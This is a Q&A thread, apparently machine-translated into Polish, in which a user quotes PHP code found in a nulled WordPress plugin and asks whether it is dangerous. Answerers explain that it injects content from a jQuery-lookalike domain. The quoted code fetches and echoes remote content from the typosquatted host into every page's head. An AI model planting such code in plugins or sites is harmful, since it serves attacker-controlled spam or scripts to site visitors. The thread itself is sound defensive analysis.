Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne?

17

Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins wp-admin security curl Sofia Rose
źródło
5
Która to wtyczka?
Daniel
Czy dostałeś wtyczkę z oficjalnej strony WP?
Ten Brazylijczyk
1
To było we wtyczce, którą jeden z moich klientów chciał, żebym uruchomił moją instalację sieciową. Wtyczka chciała uruchomić to w wp-admin. Po przeczytaniu tego zapytałem go, skąd pochodzi. Jest to zerowana wtyczka od torrenta. Krótka odpowiedź brzmiała: NIE NO xXx
Sofia Rose

Odpowiedzi:

16

Ładuje blok znaczników zawierający spam (myślałem o opublikowaniu trochę źródła, ale nie chcę w żaden sposób reklamować treści) z domeny, która jest bardzo błędnie napisana w domenie http://jquery.com/- - używana przez jQuery , renomowana i popularna biblioteka Javascript oraz taka, którą WordPress zawiera w Core. Myślę, że chodzi o to, aby ładować tę bibliotekę, podczas gdy w rzeczywistości ładuje coś zupełnie innego.

I to w inny sposób próbuje wyglądać na ładowanie jQuery. Zwróć uwagę na nazwę zmiennej $jquery.

Może także próbować załadować złośliwe skrypty. Nie sprawdziłem. I byłby zdecydowanie nazwać to niebezpieczne zwłaszcza, że treść na tej stronie mogą ulec zmianie w dowolnym czasie domenę kontrolerów ochoty.

W najlepszym wypadku spowoduje to uszkodzenie Twojej witryny, ponieważ wyszukiwarki patrzą w dół na strony rozprzestrzeniające spam.

Nie używaj tego. Nie robi nic korzystnego dla ciebie ani nikogo w sieci poza osobami prowadzącymi stronę. Jeśli znalazłeś to na renomowanej stronie, zgłoś to.

s_ha_dum
źródło
7

Tak, to niebezpieczny kod, ładowanie treści ze strony ze spamem.

Nie podałeś nazwy wtyczki, ale jeśli znalazłeś ten kod po jego zainstalowaniu w Twojej witrynie, możliwe, że kod wtyczki nie pochodzi od programisty w ten sposób, ale został zhakowany po zainstalowaniu. W takim przypadku złośliwy kod może znajdować się w większej części witryny niż tylko w tej wtyczce.

Sprawdź pobrany kod wtyczki z dowolnego miejsca, w którym pierwotnie ją otrzymałeś, i sprawdź, czy ten złośliwy kod był tam pierwotnie. Jeśli nie, Twoja witryna została zhakowana. Jeśli zdecydujesz, że tak jest, przeczytaj ten artykuł z Kodeksu .

Ben Miller - Przywróć Monikę
źródło
3
To było we wtyczce, którą jeden z moich klientów chciał, żebym uruchomił moją instalację sieciową. Wtyczka chciała uruchomić to w wp-admin. Po przeczytaniu tego zapytałem go, skąd pochodzi. Jest to zerowana wtyczka od torrenta. Krótka odpowiedź brzmiała: NO NO xXx
Sofia Rose